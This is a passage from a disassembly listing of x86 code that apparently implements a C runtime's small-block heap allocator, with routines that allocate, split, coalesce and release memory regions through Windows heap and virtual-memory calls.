jl short loc_41B262
shl ecx, 1
inc edi
jmp short loc_41B259
; ---------------------------------------------------------------------------
loc_41B262: ; CODE XREF: sub_41B0DD+17E�j
mov ecx, [ebp+var_C]
mov edx, [ecx+edi*8+4]
mov ecx, [edx]
sub ecx, [ebp+var_10]
mov esi, ecx
mov [ebp+var_8], ecx
sar esi, 4
dec esi
cmp esi, 3Fh
jle short loc_41B27F
push 3Fh
pop esi
loc_41B27F: ; CODE XREF: sub_41B0DD+19D�j
cmp esi, edi
jz loc_41B394
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41B2F0
cmp edi, 20h
jge short loc_41B2BF
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
not ebx
mov [ebp+var_14], ebx
and ebx, [eax+ecx*4+44h]
mov [eax+ecx*4+44h], ebx
dec byte ptr [edi]
jnz short loc_41B2ED
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx], ecx
jmp short loc_41B2F0
; ---------------------------------------------------------------------------
loc_41B2BF: ; CODE XREF: sub_41B0DD+1B5�j
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_4]
lea edi, [eax+edi+4]
lea ecx, [eax+ecx*4+0C4h]
not ebx
and [ecx], ebx
dec byte ptr [edi]
mov [ebp+var_14], ebx
jnz short loc_41B2ED
mov ebx, [ebp+arg_0]
mov ecx, [ebp+var_14]
and [ebx+4], ecx
jmp short loc_41B2F0
; ---------------------------------------------------------------------------
loc_41B2ED: ; CODE XREF: sub_41B0DD+1D6�j
; sub_41B0DD+203�j
mov ebx, [ebp+arg_0]
loc_41B2F0: ; CODE XREF: sub_41B0DD+1B0�j
; sub_41B0DD+1E0�j ...
mov ecx, [edx+8]
mov edi, [edx+4]
cmp [ebp+var_8], 0
mov [ecx+4], edi
mov ecx, [edx+4]
mov edi, [edx+8]
mov [ecx+8], edi
jz loc_41B3A0
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [edx+4], edi
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_41B391
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_0+3], cl
jge short loc_41B362
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41B350
mov edi, 80000000h
mov ecx, esi
shr edi, cl
or [ebx], edi
loc_41B350: ; CODE XREF: sub_41B0DD+266�j
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+var_4]
or [eax+ecx*4+44h], edi
jmp short loc_41B391
; ---------------------------------------------------------------------------
loc_41B362: ; CODE XREF: sub_41B0DD+25A�j
inc cl
cmp byte ptr [ebp+arg_0+3], 0
mov [esi+eax+4], cl
jnz short loc_41B37B
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
or [ebx+4], edi
loc_41B37B: ; CODE XREF: sub_41B0DD+28F�j
mov ecx, [ebp+var_4]
lea edi, [eax+ecx*4+0C4h]
lea ecx, [esi-20h]
mov esi, 80000000h
shr esi, cl
or [edi], esi
loc_41B391: ; CODE XREF: sub_41B0DD+24E�j
; sub_41B0DD+283�j
mov ecx, [ebp+var_8]
loc_41B394: ; CODE XREF: sub_41B0DD+1A4�j
test ecx, ecx
jz short loc_41B3A3
mov [edx], ecx
mov [ecx+edx-4], ecx
jmp short loc_41B3A3
; ---------------------------------------------------------------------------
loc_41B3A0: ; CODE XREF: sub_41B0DD+229�j
mov ecx, [ebp+var_8]
loc_41B3A3: ; CODE XREF: sub_41B0DD+2B9�j
; sub_41B0DD+2C1�j
mov esi, [ebp+var_10]
add edx, ecx
lea ecx, [esi+1]
mov [edx], ecx
mov [edx+esi-4], ecx
mov esi, [ebp+var_C]
mov ecx, [esi]
test ecx, ecx
lea edi, [ecx+1]
mov [esi], edi
jnz short loc_41B3D9
cmp ebx, ds:dword_4CF014
jnz short loc_41B3D9
mov ecx, [ebp+var_4]
cmp ecx, ds:dword_4CF00C
jnz short loc_41B3D9
and ds:dword_4CF014, 0
loc_41B3D9: ; CODE XREF: sub_41B0DD+2E0�j
; sub_41B0DD+2E8�j ...
mov ecx, [ebp+var_4]
mov [eax], ecx
lea eax, [edx+4]
loc_41B3E1: ; CODE XREF: sub_41B0DD+F0�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B0DD endp
; =============== S U B R O U T I N E =======================================
sub_41B3E6 proc near ; CODE XREF: sub_41B0DD+CC�p
mov eax, ds:dword_4CF018
mov ecx, ds:dword_4CF008
push esi
push edi
xor edi, edi
cmp eax, ecx
jnz short loc_41B429
lea eax, [ecx+ecx*4+50h]
shl eax, 2
push eax
push ds:dword_4CF01C
push edi
push ds:dword_4CF024
call ds:dword_424194 ;; RtlReAllocateHeap
cmp eax, edi
jz short loc_41B479
add ds:dword_4CF008, 10h
mov ds:dword_4CF01C, eax
mov eax, ds:dword_4CF018
loc_41B429: ; CODE XREF: sub_41B3E6+11�j
mov ecx, ds:dword_4CF01C
push 41C4h
push 8
lea eax, [eax+eax*4]
push ds:dword_4CF024
lea esi, [ecx+eax*4]
call ds:dword_4240E8 ;; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_41B479
push 4
push 2000h
push 100000h
push edi
call ds:dword_4241B4 ;; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_41B47D
push dword ptr [esi+10h]
push edi
push ds:dword_4CF024
call ds:dword_4240E4 ;; RtlFreeHeap
loc_41B479: ; CODE XREF: sub_41B3E6+30�j
; sub_41B3E6+67�j
xor eax, eax
jmp short loc_41B494
; ---------------------------------------------------------------------------
loc_41B47D: ; CODE XREF: sub_41B3E6+81�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc ds:dword_4CF018
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_41B494: ; CODE XREF: sub_41B3E6+95�j
pop edi
pop esi
retn
sub_41B3E6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B497 proc near ; CODE XREF: sub_41B0DD+DB�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_0]
push ebx
push esi
push edi
mov esi, [ecx+10h]
mov eax, [ecx+8]
xor ebx, ebx
loc_41B4A9: ; CODE XREF: sub_41B497+19�j
test eax, eax
jl short loc_41B4B2
shl eax, 1
inc ebx
jmp short loc_41B4A9
; ---------------------------------------------------------------------------
loc_41B4B2: ; CODE XREF: sub_41B497+14�j
mov eax, ebx
push 3Fh
imul eax, 204h
pop edx
lea eax, [eax+esi+144h]
mov [ebp+var_4], eax
loc_41B4C7: ; CODE XREF: sub_41B497+3A�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_41B4C7
mov edi, ebx
push 4
shl edi, 0Fh
add edi, [ecx+0Ch]
push 1000h
push 8000h
push edi
call ds:dword_4241B4 ;; VirtualAlloc
test eax, eax
jnz short loc_41B4FA
or eax, 0FFFFFFFFh
jmp loc_41B58D
; ---------------------------------------------------------------------------
loc_41B4FA: ; CODE XREF: sub_41B497+59�j
lea edx, [edi+7000h]
cmp edi, edx
ja short loc_41B540
lea eax, [edi+10h]
loc_41B507: ; CODE XREF: sub_41B497+A7�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea ecx, [eax+0FFCh]
mov dword ptr [eax-4], 0FF0h
mov [eax], ecx
lea ecx, [eax-1004h]
mov [eax+4], ecx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
lea ecx, [eax-10h]
cmp ecx, edx
jbe short loc_41B507
loc_41B540: ; CODE XREF: sub_41B497+6B�j
mov eax, [ebp+var_4]
lea ecx, [edi+0Ch]
add eax, 1F8h
push 1
pop edi
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_41B57D
or [eax+4], edi
loc_41B57D: ; CODE XREF: sub_41B497+E1�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_41B58D: ; CODE XREF: sub_41B497+5E�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B497 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B592 proc near ; CODE XREF: sub_41944F+6A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ebp+arg_8]
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
mov edx, edi
lea esi, [eax+17h]
sub edx, [ecx+0Ch]
mov eax, [ecx+10h]
and esi, 0FFFFFFF0h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
dec ecx
cmp esi, ecx
mov [ebp+arg_8], ecx
mov ebx, [ecx+edi-4]
lea edi, [ecx+edi-4]
mov [ebp+var_4], ebx
jle loc_41B740
test bl, 1
jnz loc_41B739
add ebx, ecx
cmp esi, ebx
jg loc_41B739
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_41B609
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_41B609: ; CODE XREF: sub_41B592+6F�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_41B659
cmp ecx, 20h
jnb short loc_41B635
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_41B659
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41B659
; ---------------------------------------------------------------------------
loc_41B635: ; CODE XREF: sub_41B592+82�j
add ecx, 0FFFFFFE0h
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41B659
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41B659: ; CODE XREF: sub_41B592+7D�j
; sub_41B592+9A�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_41B727
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
lea ecx, [ecx+esi-4]
cmp edi, 3Fh
jbe short loc_41B693
push 3Fh
pop edi
loc_41B693: ; CODE XREF: sub_41B592+FC�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_41B715
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_8+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_41B6EC
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41B6DF
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_41B6DF: ; CODE XREF: sub_41B592+13D�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, edi
jmp short loc_41B711
; ---------------------------------------------------------------------------
loc_41B6EC: ; CODE XREF: sub_41B592+137�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_41B702
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_41B702: ; CODE XREF: sub_41B592+15E�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
mov edx, 80000000h
loc_41B711: ; CODE XREF: sub_41B592+158�j
shr edx, cl
or [eax], edx
loc_41B715: ; CODE XREF: sub_41B592+125�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_41B72A
; ---------------------------------------------------------------------------
loc_41B727: ; CODE XREF: sub_41B592+E5�j
mov edx, [ebp+arg_4]
loc_41B72A: ; CODE XREF: sub_41B592+193�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_41B880
; ---------------------------------------------------------------------------
loc_41B739: ; CODE XREF: sub_41B592+52�j
; sub_41B592+5C�j
xor eax, eax
jmp loc_41B883
; ---------------------------------------------------------------------------
loc_41B740: ; CODE XREF: sub_41B592+49�j
jge loc_41B880
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
mov [ebp+arg_4], ebx
sar esi, 4
dec esi
mov [ebx-4], ecx
cmp esi, 3Fh
jbe short loc_41B76B
push 3Fh
pop esi
loc_41B76B: ; CODE XREF: sub_41B592+1D4�j
test byte ptr [ebp+var_4], 1
jnz loc_41B7FA
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41B784
push 3Fh
pop esi
loc_41B784: ; CODE XREF: sub_41B592+1ED�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_41B7D3
cmp esi, 20h
jnb short loc_41B7AF
mov ebx, 80000000h
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_41B7D0
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_41B7D0
; ---------------------------------------------------------------------------
loc_41B7AF: ; CODE XREF: sub_41B592+1FD�j
lea ecx, [esi-20h]
mov ebx, 80000000h
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_41B7D0
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_41B7D0: ; CODE XREF: sub_41B592+214�j
; sub_41B592+21B�j ...
mov ebx, [ebp+arg_4]
loc_41B7D3: ; CODE XREF: sub_41B592+1F8�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov ecx, [edi+4]
mov esi, [edi+8]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_41B7FA
push 3Fh
pop esi
loc_41B7FA: ; CODE XREF: sub_41B592+1DD�j
; sub_41B592+263�j
mov ecx, [ebp+var_C]
mov edi, [ecx+esi*8+4]
lea ecx, [ecx+esi*8]
mov [ebx+4], edi
mov [ebx+8], ecx
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_41B877
mov cl, [esi+eax+4]
cmp esi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [esi+eax+4], cl
jnb short loc_41B84E
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41B841
mov edi, 80000000h
mov ecx, esi
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_41B841: ; CODE XREF: sub_41B592+29F�j
lea eax, [eax+edx*4+44h]
mov edx, 80000000h
mov ecx, esi
jmp short loc_41B873
; ---------------------------------------------------------------------------
loc_41B84E: ; CODE XREF: sub_41B592+299�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_41B864
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_41B864: ; CODE XREF: sub_41B592+2C0�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
mov edx, 80000000h
loc_41B873: ; CODE XREF: sub_41B592+2BA�j
shr edx, cl
or [eax], edx
loc_41B877: ; CODE XREF: sub_41B592+287�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_41B880: ; CODE XREF: sub_41B592+1A2�j
; sub_41B592:loc_41B740�j
push 1
pop eax
loc_41B883: ; CODE XREF: sub_41B592+1A9�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B592 endp
; =============== S U B R O U T I N E =======================================
sub_41B888 proc near ; CODE XREF: sub_41ACE4+41�p
; sub_41BB80:loc_41BD4F�p
cmp ds:dword_433EA0, 0FFFFFFFFh
push ebx
push ebp
push esi
push edi
jnz short loc_41B89C
mov esi, offset off_433E90
jmp short loc_41B8B9
; ---------------------------------------------------------------------------
loc_41B89C: ; CODE XREF: sub_41B888+B�j
push 2020h
push 0
push ds:dword_4CF024
call ds:dword_4240E8 ;; RtlAllocateHeap
mov esi, eax
test esi, esi
jz loc_41B9C5
loc_41B8B9: ; CODE XREF: sub_41B888+12�j
mov ebp, ds:dword_4241B4
push 4
push 2000h
push 400000h
push 0
call ebp ; VirtualAlloc
mov edi, eax
test edi, edi
jz loc_41B9AE
push 4
mov ebx, 10000h
push 1000h
push ebx
push edi
call ebp ; VirtualAlloc
test eax, eax
jz loc_41B9A0
mov eax, offset off_433E90
cmp esi, eax
jnz short loc_41B918
cmp ds:off_433E90, 0
jnz short loc_41B908
mov ds:off_433E90, eax
loc_41B908: ; CODE XREF: sub_41B888+79�j
cmp ds:off_433E94, 0
jnz short loc_41B92D
mov ds:off_433E94, eax
jmp short loc_41B92D
; ---------------------------------------------------------------------------
loc_41B918: ; CODE XREF: sub_41B888+70�j
mov [esi], eax
mov eax, ds:off_433E94
mov [esi+4], eax
mov ds:off_433E94, esi
mov eax, [esi+4]
mov [eax], esi
loc_41B92D: ; CODE XREF: sub_41B888+87�j
; sub_41B888+8E�j
lea eax, [edi+400000h]
lea ecx, [esi+98h]
mov [esi+14h], eax
lea eax, [esi+18h]
mov [esi+0Ch], ecx
mov [esi+10h], edi
mov [esi+8], eax
xor ebp, ebp
mov ecx, 0F1h
loc_41B94F: ; CODE XREF: sub_41B888+E2�j
xor edx, edx
cmp ebp, 10h
setnl dl
dec edx
and edx, ecx
dec edx
inc ebp
mov [eax], edx
mov [eax+4], ecx
add eax, 8
cmp ebp, 400h
jl short loc_41B94F
push ebx
push 0
push edi
call sub_417330
add esp, 0Ch
loc_41B978: ; CODE XREF: sub_41B888+112�j
mov eax, [esi+10h]
add eax, ebx
cmp edi, eax
jnb short loc_41B99C
or byte ptr [edi+0F8h], 0FFh
lea eax, [edi+8]
mov [edi], eax
mov dword ptr [edi+4], 0F0h
add edi, 1000h
jmp short loc_41B978
; ---------------------------------------------------------------------------
loc_41B99C: ; CODE XREF: sub_41B888+F7�j
mov eax, esi
jmp short loc_41B9C7
; ---------------------------------------------------------------------------
loc_41B9A0: ; CODE XREF: sub_41B888+63�j
push 8000h
push 0
push edi
call ds:dword_4241B0 ;; VirtualFree
loc_41B9AE: ; CODE XREF: sub_41B888+4B�j
cmp esi, offset off_433E90
jz short loc_41B9C5
push esi
push 0
push ds:dword_4CF024
call ds:dword_4240E4 ;; RtlFreeHeap
loc_41B9C5: ; CODE XREF: sub_41B888+2B�j
; sub_41B888+12C�j
xor eax, eax
loc_41B9C7: ; CODE XREF: sub_41B888+116�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_41B888 endp
; =============== S U B R O U T I N E =======================================
sub_41B9CC proc near ; CODE XREF: sub_41BA22+A5�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 8000h
push 0
push dword ptr [esi+10h]
call ds:dword_4241B0 ;; VirtualFree
cmp ds:off_435EB0, esi
jnz short loc_41B9F1
mov eax, [esi+4]
mov ds:off_435EB0, eax
loc_41B9F1: ; CODE XREF: sub_41B9CC+1B�j
cmp esi, offset off_433E90
jz short loc_41BA19
mov eax, [esi+4]
mov ecx, [esi]
push esi
push 0
mov [eax], ecx
mov eax, [esi]
mov ecx, [esi+4]
mov [eax+4], ecx
push ds:dword_4CF024
call ds:dword_4240E4 ;; RtlFreeHeap
pop esi
retn
; ---------------------------------------------------------------------------
loc_41BA19: ; CODE XREF: sub_41B9CC+2B�j
or ds:dword_433EA0, 0FFFFFFFFh
pop esi
retn
sub_41B9CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA22 proc near ; CODE XREF: sub_41BB3B+3E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, ds:off_433E94
push edi
loc_41BA2F: ; CODE XREF: sub_41BA22+B7�j
cmp dword ptr [esi+10h], 0FFFFFFFFh
jz loc_41BACD
and [ebp+var_4], 0
lea edi, [esi+2010h]
mov ebx, 3FF000h
loc_41BA48: ; CODE XREF: sub_41BA22+72�j
cmp dword ptr [edi], 0F0h
jnz short loc_41BA89
mov eax, ebx
push 4000h
add eax, [esi+10h]
push 1000h
push eax
call ds:dword_4241B0 ;; VirtualFree
test eax, eax
jz short loc_41BA89
or dword ptr [edi], 0FFFFFFFFh
dec ds:dword_4CDA1C
mov eax, [esi+0Ch]
test eax, eax
jz short loc_41BA7E
cmp eax, edi
jbe short loc_41BA81
loc_41BA7E: ; CODE XREF: sub_41BA22+56�j
mov [esi+0Ch], edi
loc_41BA81: ; CODE XREF: sub_41BA22+5A�j
inc [ebp+var_4]
dec [ebp+arg_0]
jz short loc_41BA96
loc_41BA89: ; CODE XREF: sub_41BA22+2C�j
; sub_41BA22+46�j
sub ebx, 1000h
sub edi, 8
test ebx, ebx
jge short loc_41BA48
loc_41BA96: ; CODE XREF: sub_41BA22+65�j
cmp [ebp+var_4], 0
mov ecx, esi
mov esi, [esi+4]
jz short loc_41BACD
cmp dword ptr [ecx+18h], 0FFFFFFFFh
jnz short loc_41BACD
push 1
lea eax, [ecx+20h]
pop edx
loc_41BAAD: ; CODE XREF: sub_41BA22+9A�j
cmp dword ptr [eax], 0FFFFFFFFh
jnz short loc_41BABE
inc edx
add eax, 8
cmp edx, 400h
jl short loc_41BAAD
loc_41BABE: ; CODE XREF: sub_41BA22+8E�j
cmp edx, 400h
jnz short loc_41BACD
push ecx
call sub_41B9CC
pop ecx
loc_41BACD: ; CODE XREF: sub_41BA22+11�j
; sub_41BA22+7D�j ...
cmp esi, ds:off_433E94
jz short loc_41BADF
cmp [ebp+arg_0], 0
jg loc_41BA2F
loc_41BADF: ; CODE XREF: sub_41BA22+B1�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BA22 endp
; =============== S U B R O U T I N E =======================================
sub_41BAE4 proc near ; CODE XREF: sub_417C3B+3A�p
; sub_41944F+173�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov edx, offset off_433E90
push esi
mov ecx, edx
loc_41BAF0: ; CODE XREF: sub_41BAE4+1C�j
cmp eax, [ecx+10h]
jbe short loc_41BAFA
cmp eax, [ecx+14h]
jb short loc_41BB02
loc_41BAFA: ; CODE XREF: sub_41BAE4+F�j
mov ecx, [ecx]
cmp ecx, edx
jz short loc_41BB37
jmp short loc_41BAF0
; ---------------------------------------------------------------------------
loc_41BB02: ; CODE XREF: sub_41BAE4+14�j
test al, 0Fh
jnz short loc_41BB37
mov esi, eax
mov edx, 100h
and esi, 0FFFh
cmp esi, edx
jb short loc_41BB37
mov esi, [esp+4+arg_4]
mov [esi], ecx
mov esi, [esp+4+arg_8]
mov ecx, eax
and cx, 0F000h
sub eax, ecx
mov [esi], ecx
sub eax, edx
pop esi
sar eax, 4
lea eax, [eax+ecx+8]
retn
; ---------------------------------------------------------------------------
loc_41BB37: ; CODE XREF: sub_41BAE4+1A�j
; sub_41BAE4+20�j ...
xor eax, eax
pop esi
retn
sub_41BAE4 endp
; =============== S U B R O U T I N E =======================================
sub_41BB3B proc near ; CODE XREF: sub_417C3B+4D�p
; sub_41944F+1D5�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
sub ecx, [eax+10h]
sar ecx, 0Ch
lea eax, [eax+ecx*8+18h]
mov ecx, [esp+arg_8]
movzx edx, byte ptr [ecx]
add [eax], edx
and byte ptr [ecx], 0
cmp dword ptr [eax], 0F0h
mov dword ptr [eax+4], 0F1h
jnz short locret_41BB7F
inc ds:dword_4CDA1C
cmp ds:dword_4CDA1C, 20h
jnz short locret_41BB7F
push 10h
call sub_41BA22
pop ecx
locret_41BB7F: ; CODE XREF: sub_41BB3B+2B�j
; sub_41BB3B+3A�j
retn
sub_41BB3B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB80 proc near ; CODE XREF: sub_417BC7+4A�p
; sub_41944F+1AC�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, ds:off_435EB0
push edi
loc_41BB8E: ; CODE XREF: sub_41BB80+C6�j
mov edx, [esi+10h]
cmp edx, 0FFFFFFFFh
jz loc_41BC39
mov edi, [esi+8]
lea ecx, [esi+2018h]
mov eax, edi
sub eax, esi
sub eax, 18h
sar eax, 3
shl eax, 0Ch
add eax, edx
cmp edi, ecx
mov [ebp+var_4], eax
jnb short loc_41BBF3
loc_41BBB9: ; CODE XREF: sub_41BB80+6F�j
mov ecx, [edi]
mov ebx, [ebp+arg_0]
cmp ecx, ebx
jl short loc_41BBDC
cmp [edi+4], ebx
jbe short loc_41BBDC
push ebx
push ecx
push eax
call sub_41BD88
add esp, 0Ch
test eax, eax
jnz short loc_41BC4B
mov eax, [ebp+var_4]
mov [edi+4], ebx
loc_41BBDC: ; CODE XREF: sub_41BB80+40�j
; sub_41BB80+45�j
add edi, 8
lea ecx, [esi+2018h]
add eax, 1000h
cmp edi, ecx
mov [ebp+var_4], eax
jb short loc_41BBB9
jmp short loc_41BBF6
; ---------------------------------------------------------------------------
loc_41BBF3: ; CODE XREF: sub_41BB80+37�j
mov ebx, [ebp+arg_0]
loc_41BBF6: ; CODE XREF: sub_41BB80+71�j
mov eax, [esi+8]
mov ecx, [esi+10h]
lea edi, [esi+18h]
mov [ebp+var_8], eax
cmp edi, eax
mov [ebp+var_4], ecx
jnb short loc_41BC3C
loc_41BC09: ; CODE XREF: sub_41BB80+B5�j
mov eax, [edi]
cmp eax, ebx
jl short loc_41BC28
cmp [edi+4], ebx
jbe short loc_41BC28
push ebx
push eax
push [ebp+var_4]
call sub_41BD88
add esp, 0Ch
test eax, eax
jnz short loc_41BC4B
mov [edi+4], ebx
loc_41BC28: ; CODE XREF: sub_41BB80+8D�j
; sub_41BB80+92�j
add [ebp+var_4], 1000h
add edi, 8
cmp edi, [ebp+var_8]
jb short loc_41BC09
jmp short loc_41BC3C
; ---------------------------------------------------------------------------
loc_41BC39: ; CODE XREF: sub_41BB80+14�j
mov ebx, [ebp+arg_0]
loc_41BC3C: ; CODE XREF: sub_41BB80+87�j
; sub_41BB80+B7�j
mov esi, [esi]
cmp esi, ds:off_435EB0
jz short loc_41BC5B
jmp loc_41BB8E
; ---------------------------------------------------------------------------
loc_41BC4B: ; CODE XREF: sub_41BB80+54�j
; sub_41BB80+A3�j
mov ds:off_435EB0, esi
sub [edi], ebx
mov [esi+8], edi
jmp loc_41BD83
; ---------------------------------------------------------------------------
loc_41BC5B: ; CODE XREF: sub_41BB80+C4�j
mov eax, offset off_433E90
mov edi, eax
loc_41BC62: ; CODE XREF: sub_41BB80+F8�j
cmp dword ptr [edi+10h], 0FFFFFFFFh
jz short loc_41BC6E
cmp dword ptr [edi+0Ch], 0
jnz short loc_41BC7A
loc_41BC6E: ; CODE XREF: sub_41BB80+E6�j
mov edi, [edi]
cmp edi, eax
jz loc_41BD4F
jmp short loc_41BC62
; ---------------------------------------------------------------------------
loc_41BC7A: ; CODE XREF: sub_41BB80+EC�j
mov ebx, [edi+0Ch]
and [ebp+var_4], 0
mov esi, ebx
mov eax, ebx
sub esi, edi
sub esi, 18h
sar esi, 3
shl esi, 0Ch
add esi, [edi+10h]
cmp dword ptr [ebx], 0FFFFFFFFh
jnz short loc_41BCA9
loc_41BC98: ; CODE XREF: sub_41BB80+127�j
cmp [ebp+var_4], 10h
jge short loc_41BCA9
add eax, 8
inc [ebp+var_4]
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41BC98
loc_41BCA9: ; CODE XREF: sub_41BB80+116�j
; sub_41BB80+11C�j
mov eax, [ebp+var_4]
push 4
shl eax, 0Ch
push 1000h
push eax
push esi
mov [ebp+var_8], eax
call ds:dword_4241B4 ;; VirtualAlloc
cmp eax, esi
jnz loc_41BD81
push 0
push [ebp+var_8]
push esi
call sub_417330
mov edx, [ebp+var_4]
add esp, 0Ch
test edx, edx
mov ecx, ebx
jle short loc_41BD10
lea eax, [esi+4]
